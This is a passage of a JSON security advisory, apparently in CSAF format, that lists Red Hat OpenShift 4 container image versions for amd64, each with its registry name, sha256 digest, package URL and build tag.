"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aa31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3Adaddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775559294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-operator-rhel9@sha256%3A5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557242"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3Ae6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Ad1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3Aa252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3A90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3A4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3Afcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9@sha256%3A8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9-operator@sha256%3A96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3A3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557766"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3Abe5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3Adf471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Acba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3Ac948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3Aa362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Adae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3A4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3A46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3Add33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"product": {
